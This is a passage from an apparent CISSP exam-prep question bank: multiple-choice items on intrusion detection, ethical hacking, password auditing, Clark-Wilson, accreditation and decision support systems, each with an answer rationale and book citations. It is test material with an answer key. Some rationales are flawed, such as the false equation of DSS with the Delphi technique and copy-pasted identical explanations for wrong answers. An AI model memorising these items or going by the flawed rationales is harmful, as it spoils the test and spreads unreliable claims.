both pay for and reserve a seat; OR
neither pay for nor reserve a seat.
The booking system does not consider it acceptable for a customer to pay for a ticket without securing the seat, nor to reserve the seat without payment succeeding.
CONCURRENCY
Database concurrency controls ensure that transactions occur in an ordered fashion.
The main job of these controls is to protect transactions issued by different users/applications from the effects of each other. They must preserve the four characteristics of database transactions ACID test: Atomicity, Consistency, Isolation, and Durability. Read http://en.wikipedia.org/wiki/ACID for more details on the ACID test.
Thus concurrency control is an essential element for correctness in any system where two database transactions or more, executed with time overlap, can access the same data, e.g., virtually in any general-purpose database system. A well established concurrency control theory exists for database systems: serializability theory, which allows to effectively design and analyze concurrency control methods and mechanisms.
Concurrency is not an issue in itself, it is the lack of proper concurrency controls that makes it a serious issue.
The following answers are incorrect:
The transactions should be dropped from processing. Is incorrect because the transactions are processed and when erroneous or invalid transactions are detected the transaction can be recovered by reviewing the logs.
The transactions should be processed after the program makes adjustments. Is incorrect because the transactions are processed and when erroneous or invalid transactions are detected the transaction can be recovered by reviewing the logs.
The transactions should be corrected and reprocessed. Is incorrect because the transactions are processed and when erroneous or invalid transactions are detected the transaction can be recovered by reviewing the logs.
References:
Hernandez CISSP, Steven (2012-12-21). Official (ISC)2 Guide to the CISSP CBK, Third Edition ((ISC)2 Press) (Kindle Locations 12749-12768). Auerbach Publications. Kindle Edition.
and
http://en.wikipedia.org/wiki/Online_transaction_processing
and
http://databases.about.com/od/administration/g/concurrency.htm
The fact that a network-based IDS reviews packets payload and headers enable which of the following?
Detection of denial of service
Detection of all viruses
Detection of data corruption
Detection of all password guessing attacks
Because a network-based IDS reviews packets and headers, denial of service attacks can also be detected.
This question is an easy question if you go through the process of elimination. When you see an answer containing the keyword: ALL It is something a give away that it is not the proper answer. On the real exam you may encounter a few question where the use of the work ALL renders the choice invalid. Pay close attention to such keyword.
The following are incorrect answers:
Even though most IDSs can detect some viruses and some password guessing attacks, they cannot detect ALL viruses or ALL password guessing attacks. Therefore these two answers are only detractors.
Unless the IDS knows the valid values for a certain dataset, it can NOT detect data corruption.
Reference used for this question:
KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Page 48.
Which of the following is NOT a valid reason to use external penetration service firms rather than corporate resources?
They are more cost-effective
They offer a lack of corporate bias
They use highly talented ex-hackers
They ensure a more complete reporting
Two points are important to consider when it comes to ethical hacking: integrity and independence.
By not using an ethical hacking firm that hires or subcontracts to ex-hackers of others who have criminal records, an entire subset of risks can be avoided by an organization. Also, it is not cost-effective for a single firm to fund the effort of the ongoing research and development, systems development, and maintenance that is needed to operate state-of-the-art proprietary and open source testing tools and techniques.
External penetration firms are more effective than internal penetration testers because they are not influenced by any previous system security decisions, knowledge of the current system environment, or future system security plans. Moreover, an employee performing penetration testing might be reluctant to fully report security gaps.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, John Wiley & Sons, 2001, Appendix F: The Case for Ethical Hacking (page 517).
What setup should an administrator use for regularly testing the strength of user passwords?
A networked workstation so that the live password database can easily be accessed by the cracking program.
A networked workstation so the password database can easily be copied locally and processed by the cracking program.
A standalone workstation on which the password database is copied and processed by the cracking program.
A password-cracking program is unethical; therefore it should not be used.
Poor password selection is frequently a major security problem for any system's security. Administrators should obtain and use password-guessing programs frequently to identify those users having easily guessed passwords.
Because password-cracking programs are very CPU intensive and can slow the system on which it is running, it is a good idea to transfer the encrypted passwords to a standalone (not networked) workstation. Also, by doing the work on a non-networked machine, any results found will not be accessible by anyone unless they have physical access to that system.
Out of the four choice presented above this is the best choice.
However, in real life you would have strong password policies that enforce complexity requirements and does not let the user choose a simple or short password that can be easily cracked or guessed. That would be the best choice if it was one of the choice presented.
Another issue with password cracking is one of privacy. Many password cracking tools can avoid this by only showing the password was cracked and not showing what the password actually is. It is masking the password being used from the person doing the cracking.
Source: National Security Agency, Systems and Network Attack Center (SNAC), The 60 Minute Network Security Guide, February 2002, page 8.
Which of the following reviews system and event logs to detect attacks on the host and determine if the attack was successful?
host-based IDS
firewall-based IDS
bastion-based IDS
server-based IDS
A host-based IDS can review the system and event logs in order to detect an attack on the host and to determine if the attack was successful.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Page 48.
Which conceptual approach to intrusion detection system is the most common?
Behavior-based intrusion detection
Knowledge-based intrusion detection
Statistical anomaly-based intrusion detection
Host-based intrusion detection
There are two conceptual approaches to intrusion detection. Knowledge-based intrusion detection uses a database of known vulnerabilities to look for current attempts to exploit them on a system and trigger an alarm if an attempt is found. The other approach, not as common, is called behaviour-based or statistical analysis-based. A host-based intrusion detection system is a common implementation of intrusion detection, not a conceptual approach.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, John Wiley & Sons, 2001, Chapter 3: Telecommunications and Network Security (page 63).
Also: HARRIS, Shon, All-In-One CISSP Certification Exam Guide, McGraw-Hill/Osborne, 2002, chapter 4: Access Control (pages 193-194).
Which of the following is NOT a characteristic of a host-based intrusion detection system?
A HIDS does not consume large amounts of system resources
A HIDS can analyse system logs, processes and resources
A HIDS looks for unauthorized changes to the system
A HIDS can notify system administrators when unusual events are identified
A HIDS does not consume large amounts of system resources is the correct choice. HIDS can consume inordinate amounts of CPU and system resources in order to function effectively, especially during an event.
All the other answers are characteristics of HIDSes
A HIDS can:
scrutinize event logs, critical system files, and other auditable system resources;
look for unauthorized change or suspicious patterns of behavior or activity
can send alerts when unusual events are discovered
Which of the following monitors network traffic in real time?
network-based IDS
host-based IDS
application-based IDS
firewall-based IDS
This type of IDS is called a network-based IDS because monitors network traffic in real time.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Page 48.
Why would anomaly detection IDSs often generate a large number of false positives?
Because they can only identify correctly attacks they already know about.
Because they are application-based are more subject to attacks.
Because they can't identify abnormal behavior.
Because normal patterns of user and system behavior can vary wildly.
Unfortunately, anomaly detectors and the Intrusion Detection Systems (IDS) based on them often produce a large number of false alarms, as normal patterns of user and system behavior can vary wildly. Being only able to identify correctly attacks they already know about is a characteristic of misuse detection (signature-based) IDSs. Application-based IDSs are a special subset of host-based IDSs that analyze the events transpiring within a software application. They are more vulnerable to attacks than host-based IDSs. Not being able to identify abnormal behavior would not cause false positives, since they are not identified.
Source: DUPUIS, Cl?ment, Access Control Systems and Methodology CISSP Open Study Guide, version 1.0, march 2002 (page 92).
If an organization were to monitor their employees' e-mail, it should not:
Monitor only a limited number of employees.
Inform all employees that e-mail is being monitored.
Explain who can read the e-mail and how long it is backed up.
Explain what is considered an acceptable use of the e-mail system.
Monitoring has to be conducted is a lawful manner and applied in a consistent fashion; thus should be applied uniformly to all employees, not only to a small number.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, John Wiley & Sons, 2001, Chapter 9: Law, Investigation, and Ethics (page 304).
Which of the following would assist the most in Host Based intrusion detection?
audit trails.
access control lists.
security clearances
host-based authentication
To assist in Intrusion Detection you would review audit logs for access violations.
The following answers are incorrect:
access control lists. This is incorrect because access control lists determine who has access to what but do not detect intrusions.
security clearances. This is incorrect because security clearances determine who has access to what but do not detect intrusions.
host-based authentication. This is incorrect because host-based authentication determine who have been authenticated to the system but do not dectect intrusions.
Several analysis methods can be employed by an IDS, each with its own strengths and weaknesses, and their applicability to any given situation should be carefully considered. There are two basic IDS analysis methods that exists. Which of the basic method is more prone to false positive?
Pattern Matching (also called signature analysis)
Anomaly Detection
Host-based intrusion detection
Network-based intrusion detection
Several analysis methods can be employed by an IDS, each with its own strengths and weaknesses, and their applicability to any given situation should be carefully considered.
There are two basic IDS analysis methods:
1. Pattern Matching (also called signature analysis), and
2. Anomaly detection
PATTERN MATCHING
Some of the first IDS products used signature analysis as their detection method and simply looked for known characteristics of an attack (such as specific packet sequences or text in the data stream) to produce an alert if that pattern was detected. If a new or different attack vector is used, it will not match a known signature and, thus, slip past the IDS.
ANOMALY DETECTION
Alternately, anomaly detection uses behavioral characteristics of a system’s operation or network traffic to draw conclusions on whether the traffic represents a risk to the network or host. Anomalies may include but are not limited to:
Multiple failed log-on attempts
Users logging in at strange hours
Unexplained changes to system clocks
Unusual error messages
Unexplained system shutdowns or restarts
Attempts to access restricted files
An anomaly-based IDS tends to produce more data because anything outside of the expected behavior is reported. Thus, they tend to report more false positives as expected behavior patterns change. An advantage to anomaly-based IDS is that, because they are based on behavior identification and not specific patterns of traffic, they are often able to detect new attacks that may be overlooked by a signature-based system. Often information from an anomaly-based IDS may be used to create a pattern for a signature-based IDS.
Host Based Intrusion Detection (HIDS)
HIDS is the implementation of IDS capabilities at the host level. Its most significant difference from NIDS is that related processes are limited to the boundaries of a single-host system. However, this presents advantages in effectively detecting objectionable activities because the IDS process is running directly on the host system, not just observing it from the network. This offers unfettered access to system logs, processes, system information, and device information, and virtually eliminates limits associated with encryption. The level of integration represented by HIDS increases the level of visibility and control at the disposal of the HIDS application.
Network Based Intrustion Detection (NIDS)
NIDS are usually incorporated into the network in a passive architecture, taking advantage of promiscuous mode access to the network. This means that it has visibility into every packet traversing the network segment. This allows the system to inspect packets and monitor sessions without impacting the network or the systems and applications utilizing the network.
Below you have other ways that instrusion detection can be performed:
Stateful Matching Intrusion Detection
Stateful matching takes pattern matching to the next level. It scans for attack signatures in the context of a stream of traffic or overall system behavior rather than the individual packets or discrete system activities. For example, an attacker may use a tool that sends a volley of valid packets to a targeted system. Because all the packets are valid, pattern matching is nearly useless. However, the fact that a large volume of the packets was seen may, itself, represent a known or potential attack pattern. To evade attack, then, the attacker may send the packets from multiple locations with long wait periods between each transmission to either confuse the signature detection system or exhaust its session timing window. If the IDS service is tuned to record and analyze traffic over a long period of time it may detect such an attack. Because stateful matching also uses signatures, it too must be updated regularly and, thus, has some of the same limitations as pattern matching.
Statistical Anomaly-Based Intrusion Detection
The statistical anomaly-based IDS analyzes event data by comparing it to typical, known, or predicted traffic profiles in an effort to find potential security breaches. It attempts to identify suspicious behavior by analyzing event data and identifying patterns of entries that deviate from a predicted norm. This type of detection method can be very effective and, at a very high level, begins to take on characteristics seen in IPS by establishing an expected baseline of behavior and acting on divergence from that baseline. However, there are some potential issues that may surface with a statistical IDS. Tuning the IDS can be challenging and, if not performed regularly, the system will be prone to false positives. Also, the definition of normal traffic can be open to interpretation and does not preclude an attacker from using normal activities to penetrate systems. Additionally, in a large, complex, dynamic corporate environment, it can be difficult, if not impossible, to clearly define “normal” traffic. The value of statistical analysis is that the system has the potential to detect previously unknown attacks. This is a huge departure from the limitation of matching previously known signatures. Therefore, when combined with signature matching technology, the statistical anomaly-based IDS can be very effective.
Protocol Anomaly-Based Intrusion Detection
A protocol anomaly-based IDS identifies any unacceptable deviation from expected behavior based on known network protocols. For example, if the IDS is monitoring an HTTP session and the traffic contains attributes that deviate from established HTTP session protocol standards, the IDS may view that as a malicious attempt to manipulate the protocol, penetrate a firewall, or exploit a vulnerability. The value of this method is directly related to the use of well-known or well-defined protocols within an environment. If an organization primarily uses well-known protocols (such as HTTP, FTP, or telnet) this can be an effective method of performing intrusion detection. In the face of custom or nonstandard protocols, however, the system will have more difficulty or be completely unable to determine the proper packet format. Interestingly, this type of method is prone to the same challenges faced by signature-based IDSs. For example, specific protocol analysis modules may have to be added or customized to deal with unique or new protocols or unusual use of standard protocols. Nevertheless, having an IDS that is intimately aware of valid protocol use can be very powerful when an organization employs standard implementations of common protocols.
Traffic Anomaly-Based Intrusion
Detection A traffic anomaly-based IDS identifies any unacceptable deviation from expected behavior based on actual traffic structure. When a session is established between systems, there is typically an expected pattern and behavior to the traffic transmitted in that session. That traffic can be compared to expected traffic conduct based on the understandings of traditional system interaction for that type of connection. Like the other types of anomaly-based IDS, traffic anomaly-based IDS relies on the ability to establish “normal” patterns of traffic and expected modes of behavior in systems, networks, and applications. In a highly dynamic environment it may be difficult, if not impossible, to clearly define these parameters.
Reference(s) used for this question:
Hernandez CISSP, Steven (2012-12-21). Official (ISC)2 Guide to the CISSP CBK, Third Edition ((ISC)2 Press) (Kindle Locations 3664-3686). Auerbach Publications. Kindle Edition.
and
Hernandez CISSP, Steven (2012-12-21). Official (ISC)2 Guide to the CISSP CBK, Third Edition ((ISC)2 Press) (Kindle Locations 3711-3734). Auerbach Publications. Kindle Edition.
and
Hernandez CISSP, Steven (2012-12-21). Official (ISC)2 Guide to the CISSP CBK, Third Edition ((ISC)2 Press) (Kindle Locations 3694-3711). Auerbach Publications. Kindle Edition.
Which of the following statements pertaining to ethical hacking is incorrect?
An organization should use ethical hackers who do not sell auditing, hardware, software, firewall, hosting, and/or networking services.
Testing should be done remotely to simulate external threats.
Ethical hacking should not involve writing to or modifying the target systems negatively.
Ethical hackers never use tools that have the potential of affecting servers or services.
This means that many of the tools used for ethical hacking have the potential of exploiting vulnerabilities and causing disruption to IT system. It is up to the individuals performing the tests to be familiar with their use and to make sure that no such disruption can happen or at least shoudl be avoided.
The first step before sending even one single packet to the target would be to have a signed agreement with clear rules of engagement and a signed contract. The signed contract explains to the client the associated risks and the client must agree to them before you even send one packet to the target range. This way the client understand that some of the test could lead to interruption of service or even crash a server. The client signs that he is aware of such risks and willing to accept them.
The following are incorrect answers:
An organization should use ethical hackers who do not sell auditing, hardware, software, firewall, hosting, and/or networking services. An ethical hacking firm's independence can be questioned if they sell security solutions at the same time as doing testing for the same client. There has to be independance between the judge (the tester) and the accuse (the client).
Testing should be done remotely to simulate external threats Testing simulating a cracker from the Internet is often time one of the first test being done, this is to validate perimeter security. By performing tests remotely, the ethical hacking firm emulates the hacker's approach more realistically.
Ethical hacking should not involve writing to or modifying the target systems negatively. Even though ethical hacking should not involve negligence in writing to or modifying the target systems or reducing its response time, comprehensive penetration testing has to be performed using the most complete tools available just like a real cracker would.
Reference(s) used for this question:
KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, John Wiley & Sons, 2001, Appendix F: The Case for Ethical Hacking (page 520).
Knowledge-based Intrusion Detection Systems (IDS) are more common than:
Network-based IDS
Host-based IDS
Behavior-based IDS
Application-Based IDS
Knowledge-based IDS are more common than behavior-based ID systems.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Page 63.
Application-Based IDS - "a subset of HIDS that analyze what's going on in an application using the transaction log files of the application." Source: Official ISC2 CISSP CBK Review Seminar Student Manual Version 7.0 p. 87
Host-Based IDS - "an implementation of IDS capabilities at the host level. Its most significant difference from NIDS is intrusion detection analysis, and related processes are limited to the boundaries of the host." Source: Official ISC2 Guide to the CISSP CBK - p. 197
Network-Based IDS - "a network device, or dedicated system attached to the network, that monitors traffic traversing the network segment for which it is integrated." Source: Official ISC2 Guide to the CISSP CBK - p. 196
CISSP for dummies a book that we recommend for a quick overview of the 10 domains has nice and concise coverage of the subject:
Intrusion detection is defined as real-time monitoring and analysis of network activity and data for potential vulnerabilities and attacks in progress. One major limitation of current intrusion detection system (IDS) technologies is the requirement to filter false alarms lest the operator (system or security administrator) be overwhelmed with data. IDSes are classified in many different ways, including active and passive, network-based and host-based, and knowledge-based and behavior-based:
Active and passive IDS
An active IDS (now more commonly known as an intrusion prevention system — IPS) is a system that's configured to automatically block suspected attacks in progress without any intervention required by an operator. IPS has the advantage of providing real-time corrective action in response to an attack but has many disadvantages as well. An IPS must be placed in-line along a network boundary; thus, the IPS itself is susceptible to attack. Also, if false alarms and legitimate traffic haven't been properly identified and filtered, authorized users and applications may be improperly denied access. Finally, the IPS itself may be used to effect a Denial of Service (DoS) attack by intentionally flooding the system with alarms that cause it to block connections until no connections or bandwidth are available.
A passive IDS is a system that's configured only to monitor and analyze network traffic activity and alert an operator to potential vulnerabilities and attacks. It isn't capable of performing any protective or corrective functions on its own. The major advantages of passive IDSes are that these systems can be easily and rapidly deployed and are not normally susceptible to attack themselves.
Network-based and host-based IDS
A network-based IDS usually consists of a network appliance (or sensor) with a Network Interface Card (NIC) operating in promiscuous mode and a separate management interface. The IDS is placed along a network segment or boundary and monitors all traffic on that segment.
A host-based IDS requires small programs (or agents) to be installed on individual systems to be monitored. The agents monitor the operating system and write data to log files and/or trigger alarms. A host-based IDS can only monitor the individual host systems on which the agents are installed; it doesn't monitor the entire network.
Knowledge-based and behavior-based IDS
A knowledge-based (or signature-based) IDS references a database of previous attack profiles and known system vulnerabilities to identify active intrusion attempts. Knowledge-based IDS is currently more common than behavior-based IDS.
Advantages of knowledge-based systems include the following:
It has lower false alarm rates than behavior-based IDS.
Alarms are more standardized and more easily understood than behavior-based IDS.
Disadvantages of knowledge-based systems include these:
Signature database must be continually updated and maintained.
New, unique, or original attacks may not be detected or may be improperly classified.
A behavior-based (or statistical anomaly–based) IDS references a baseline or learned pattern of normal system activity to identify active intrusion attempts. Deviations from this baseline or pattern cause an alarm to be triggered.
Advantages of behavior-based systems include that they
Dynamically adapt to new, unique, or original attacks.
Are less dependent on identifying specific operating system vulnerabilities.
Disadvantages of behavior-based systems include
Higher false alarm rates than knowledge-based IDSes.
Usage patterns that may change often and may not be static enough to implement an effective behavior-based IDS.
Which of the following is not a preventive operational control?
Protecting laptops, personal computers and workstations.
Controlling software viruses.
Controlling data media access and disposal.
Conducting security awareness and technical training.
Conducting security awareness and technical training to ensure that end users and system users are aware of the rules of behaviour and their responsibilities in protecting the organization's mission is an example of a preventive management control, therefore not an operational control.
Source: STONEBURNER, Gary et al., NIST Special publication 800-30, Risk management Guide for Information Technology Systems, 2001 (page 37).
Which of the following is an IDS that acquires data and defines a "normal" usage profile for the network or host?
Statistical Anomaly-Based ID
Signature-Based ID
dynamical anomaly-based ID
inferential anomaly-based ID
Statistical Anomaly-Based ID - With this method, an IDS acquires data and defines a "normal" usage profile for the network or host that is being monitored.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Page 49.
Due care is not related to:
Good faith
Prudent man
Profit
Best interest
Officers and directors of a company are expected to act carefully in fulfilling their tasks. A director shall act in good faith, with the care an ordinarily prudent person in a like position would exercise under similar circumstances and in a manner he reasonably believes is in the best interest of the enterprise. The notion of profit would tend to go against the due care principle.
Source: ANDRESS, Mandy, Exam Cram CISSP, Coriolis, 2001, Chapter 10: Law, Investigation, and Ethics (page 186).
Which of the following is used to monitor network traffic or to monitor host audit logs in real time to determine violations of system security policy that have taken place?
Intrusion Detection System
Compliance Validation System
Intrusion Management System (IMS)
Compliance Monitoring System
An Intrusion Detection System (IDS) is a system that is used to monitor network traffic or to monitor host audit logs in order to determine if any violations of an organization's system security policy have taken place.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Page 48.
Which of the following BEST explains why computerized information systems frequently fail to meet the needs of users?
Inadequate quality assurance (QA) tools.
Constantly changing user needs.
Inadequate user participation in defining the system's requirements.
Inadequate project management.
Inadequate user participation in defining the system's requirements. Most projects fail to meet the needs of the users because there was inadequate input in the initial steps of the project from the user community and what their needs really are.
The other answers, while potentially valid, are incorrect because they do not represent the most common problem assosciated with information systems failing to meet the needs of users.
References: All in One pg 834
Only users can define what their needs are and, therefore, what the system should accomplish. Lack of adequate user involvement, especially in the systems requirements phase, will usually result in a system that doesn't fully or adequately address the needs of the user.
Source: Information Systems Audit and Control Association, Certified Information Systems Auditor 2002 review manual, chapter 6: Business Application System Development, Acquisition, Implementation and Maintenance (page 296).
Risk analysis is MOST useful when applied during which phase of the system development process?
Project initiation and Planning
Functional Requirements definition
System Design Specification
Development and Implementation
In most projects the conditions for failure are established at the beginning of the project. Thus risk management should be established at the commencement of the project with a risk assessment during project initiation.
As it is clearly stated in the ISC2 book: Security should be included at the first phase of development and throughout all of the phases of the system development life cycle. This is a key concept to understand for the purpose for the exam.
The most useful time is to undertake it at project initiation, although it is often valuable to update the current risk analysis at later stages.
Attempting to retrofit security after the SDLC is completed would cost a lot more money and might be impossible in some cases. Look at the family of browsers we use today, for the past 8 years they always claim that it is the most secure version that has been released and within days vulnerabilities will be found.
Risks should be monitored throughout the SDLC of the project and reassessed when appropriate.
The phases of the SDLC can very from one source to another one. It could be as simple as Concept, Design, and Implementation. It could also be expanded to include more phases such as this list proposed within the ISC2 Official Study book:
Project Initiation and Planning
Functional Requirements Definition
System Design Specification
Development and Implementation
Documentations and Common Program Controls
Testing and Evaluation Control, certification and accreditation (C&A)
Transition to production (Implementation)
And there are two phases that will extend beyond the SDLC, they are:
Operation and Maintenance Support (O&M)
Revisions and System Replacement (Disposal)
Source: Information Systems Audit and Control Association, Certified Information Systems Auditor 2002 review manual, chapter 6: Business Application System Development, Acquisition, Implementation and Maintenance (page 291).
and
The Official ISC2 Guide to the CISSP CBK , Second Edition, Page 182-185
Which of the following is best defined as an administrative declaration by a designated authority that an information system is approved to operate in a particular security configuration with a prescribed set of safeguards?
Certification
Declaration
Audit
Accreditation
Accreditation: is an administrative declaration by a designated authority that an information system is approved to operate in a particular security configuration with a prescribed set of safeguards. It is usually based on a technical certification of the system's security mechanisms.
Certification: Technical evaluation (usually made in support of an accreditation action) of an information system\'s security features and other safeguards to establish the extent to which the system\'s design and implementation meet specified security requirements.
Source: SHIREY, Robert W., RFC2828: Internet Security Glossary, may 2000.
IT security measures should:
Be complex
Be tailored to meet organizational security goals.
Make sure that every asset of the organization is well protected.
Not be developed in a layered fashion.
In general, IT security measures are tailored according to an organization's unique needs. While numerous factors, such as the overriding mission requirements, and guidance, are to be considered, the fundamental issue is the protection of the mission or business from IT security-related, negative impacts. Because IT security needs are not uniform, system designers and security practitioners should consider the level of trust when connecting to other external networks and internal sub-domains. Recognizing the uniqueness of each system allows a layered security strategy to be used - implementing lower assurance solutions with lower costs to protect less critical systems and higher assurance solutions only at the most critical areas.
The more complex the mechanism, the more likely it may possess exploitable flaws. Simple mechanisms tend to have fewer exploitable flaws and require less maintenance. Further, because configuration management issues are simplified, updating or replacing a simple mechanism becomes a less intensive process.
Security designs should consider a layered approach to address or protect against a specific threat or to reduce a vulnerability. For example, the use of a packet-filtering router in conjunction with an application gateway and an intrusion detection system combine to increase the work-factor an attacker must expend to successfully attack the system. Adding good password controls and adequate user training improves the system's security posture even more.
The need for layered protections is especially important when commercial-off-the-shelf (COTS) products are used. Practical experience has shown that the current state-of-the-art for security quality in COTS products does not provide a high degree of protection against sophisticated attacks. It is possible to help mitigate this situation by placing several controls in series, requiring additional work by attackers to accomplish their goals.
Source: STONEBURNER, Gary & al, National Institute of Standards and Technology (NIST), NIST Special Publication 800-27, Engineering Principles for Information Technology Security (A Baseline for Achieving Security), June 2001 (pages 9-10).
What can best be defined as the detailed examination and testing of the security features of an IT system or product to ensure that they work correctly and effectively and do not show any logical vulnerabilities, such as evaluation criteria?
Acceptance testing
Evaluation
Certification
Accreditation
Evaluation as a general term is described as the process of independently assessing a system against a standard of comparison, such as evaluation criteria. Evaluation criterias are defined as a benchmark, standard, or yardstick against which accomplishment, conformance, performance, and suitability of an individual, hardware, software, product, or plan, as well as of risk-reward ratio is measured.
What is computer security evaluation?
Computer security evaluation is the detailed examination and testing of the security features of an IT system or product to ensure that they work correctly and effectively and do not show any logical vulnerabilities. The Security Target determines the scope of the evaluation. It includes a claimed level of Assurance that determines how rigorous the evaluation is.
Criteria
Criteria are the "standards" against which security evaluation is carried out. They define several degrees of rigour for the testing and the levels of assurance that each confers. They also define the formal requirements needed for a product (or system) to meet each Assurance level.
TCSEC
The US Department of Defense published the first criteria in 1983 as the Trusted Computer Security Evaluation Criteria (TCSEC), more popularly known as the "Orange Book". The current issue is dated 1985. The US Federal Criteria were drafted in the early 1990s as a possible replacement but were never formally adopted.
ITSEC
During the 1980s, the United Kingdom, Germany, France and the Netherlands produced versions of their own national criteria. These were harmonised and published as the Information Technology Security Evaluation Criteria (ITSEC). The current issue, Version 1.2, was published by the European Commission in June 1991. In September 1993, it was followed by the IT Security Evaluation Manual (ITSEM) which specifies the methodology to be followed when carrying out ITSEC evaluations.
Common Criteria
The Common Criteria represents the outcome of international efforts to align and develop the existing European and North American criteria. The Common Criteria project harmonises ITSEC, CTCPEC (Canadian Criteria) and US Federal Criteria (FC) into the Common Criteria for Information Technology Security Evaluation (CC) for use in evaluating products and systems and for stating security requirements in a standardised way. Increasingly it is replacing national and regional criteria with a worldwide set accepted by the International Standards Organisation (ISO15408).
The following answer were not applicable:
Certification is the process of performing a comprehensive analysis of the security features and safeguards of a system to establish the extent to which the security requirements are satisfied. Shon Harris states in her book that Certification is the comprehensive technical evaluation of the security components and their compliance for the purpose of accreditation.
Wikipedia describes it as: Certification is a comprehensive evaluation of the technical and non-technical security controls (safeguards) of an information system to support the accreditation process that establishes the extent to which a particular design and implementation meets a set of specified security requirements
Accreditation is the official management decision to operate a system. Accreditation is the formal declaration by a senior agency official (Designated Accrediting Authority (DAA) or Principal Accrediting Authority (PAA)) that an information system is approved to operate at an acceptable level of risk, based on the implementation of an approved set of technical, managerial, and procedural security controls (safeguards).
Acceptance testing refers to user testing of a system before accepting delivery.
Reference(s) used for this question:
HARE, Chris, Security Architecture and Models, Area 6 CISSP Open Study Guide, January 2002.
and
https://en.wikipedia.org/wiki/Certification_and_Accreditation
and
http://www.businessdictionary.com/definition/evaluation-criteria.html
and
http://www.cesg.gov.uk/products_services/iacs/cc_and_itsec/secevalcriteria.shtml
Which of the following is not a responsibility of an information (data) owner?
Determine what level of classification the information requires.
Periodically review the classification assignments against business needs.
Delegate the responsibility of data protection to data custodians.
Running regular backups and periodically testing the validity of the backup data.
This responsibility would be delegated to a data custodian rather than being performed directly by the information owner.
"Determine what level of classification the information requires" is incorrect. This is one of the major responsibilities of an information owner.
"Periodically review the classification assignments against business needs" is incorrect. This is one of the major responsibilities of an information owner.
"Delegates responsibility of maintenance of the data protection mechanisms to the data custodian" is incorrect. This is a responsibility of the information owner.
References:
CBK p. 105.
AIO3, p. 53-54, 960
Which of the following is not one of the three goals of Integrity addressed by the Clark-Wilson model?
Prevention of the modification of information by unauthorized users.
Prevention of the unauthorized or unintentional modification of information by authorized users.
Preservation of the internal and external consistency.
Prevention of the modification of information by authorized users.
There is no need to prevent modification from authorized users. They are authorized and allowed to make the changes. On top of this, it is also NOT one of the goal of Integrity within Clark-Wilson.
As it turns out, the Biba model addresses only the first of the three integrity goals which is Prevention of the modification of information by unauthorized users. Clark-Wilson addresses all three goals of integrity.
The Clark–Wilson model improves on Biba by focusing on integrity at the transaction level and addressing three major goals of integrity in a commercial environment. In addition to preventing changes by unauthorized subjects, Clark and Wilson realized that high-integrity systems would also have to prevent undesirable changes by authorized subjects and to ensure that the system continued to behave consistently. It also recognized that it would need to ensure that there is constant mediation between every subject and every object if such integrity was going to be maintained.
Integrity is addressed through the following three goals:
1. Prevention of the modification of information by unauthorized users.
2. Prevention of the unauthorized or unintentional modification of information by authorized users.
3. Preservation of the internal and external consistency.
The following reference(s) were used for this question:
Hernandez CISSP, Steven (2012-12-21). Official (ISC)2 Guide to the CISSP CBK, Third Edition ((ISC)2 Press) (Kindle Locations 17689-17694). Auerbach Publications. Kindle Edition.
and
KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Page 31.
Which of the following is a CHARACTERISTIC of a decision support system (DSS) in regards to Threats and Risks Analysis?
DSS is aimed at solving highly structured problems.
DSS emphasizes flexibility in the decision making approach of users.
DSS supports only structured decision-making tasks.
DSS combines the use of models with non-traditional data access and retrieval functions.
DSS emphasizes flexibility in the decision-making approach of users. It is aimed at solving less structured problems, combines the use of models and analytic techniques with traditional data access and retrieval functions and supports semi-structured decision-making tasks.
DSS is sometimes referred to as the Delphi Method or Delphi Technique:
The Delphi technique is a group decision method used to ensure that each member gives an honest opinion of what he or she thinks the result of a particular threat will be. This avoids a group of individuals feeling pressured to go along with others’ thought processes and enables them to participate in an independent and anonymous way. Each member of the group provides his or her opinion of a certain threat and turns it in to the team that is performing the analysis. The results are compiled and distributed to the group members, who then write down their comments anonymously and return them to the analysis group. The comments are compiled and redistributed for more comments until a consensus is formed. This method is used to obtain an agreement on cost, loss values, and probabilities of occurrence without individuals having to agree verbally.
Here is the ISC2 book coverage of the subject:
One of the methods that uses consensus relative to valuation of information is the consensus/modified Delphi method. Participants in the valuation exercise are asked to comment anonymously on the task being discussed. This information is collected and disseminated to a participant other than the original author. This participant comments upon the observations of the original author. The information gathered is discussed in a public forum and the best course is agreed upon by the group (consensus).
EXAM TIP:
The DSS is what some of the books are referring to as the Delphi Method or Delphi Technique. Be familiar with both terms for the purpose of the exam.
The other answers are incorrect:
'DSS is aimed at solving highly structured problems' is incorrect because it is aimed at solving less structured problems.
'DSS supports only structured decision-making tasks' is also incorrect as it supports semi-structured decision-making tasks.
'DSS combines the use of models with non-traditional data access and retrieval functions' is also incorrect as it combines the use of models and analytic techniques with traditional data access and retrieval functions.
Reference(s) used for this question:
Harris, Shon (2012-10-25). CISSP All-in-One Exam Guide, 6th Edition (p. 91). McGraw-Hill. Kindle Edition.
and
Schneiter, Andrew (2013-04-15). Official (ISC)2 Guide to the CISSP CBK, Third Edition : Information Security Governance and Risk Management ((ISC)2 Press) (Kindle Locations 1424-1426). Auerbach Publications. Kindle Edition.
In an organization, an Information Technology security function should:
Be a function within the information systems function of an organization.
Report directly to a specialized business unit such as legal, corporate security or insurance.
Be lead by a Chief Security Officer and report directly to the CEO.
Be independent but report to the Information Systems function.
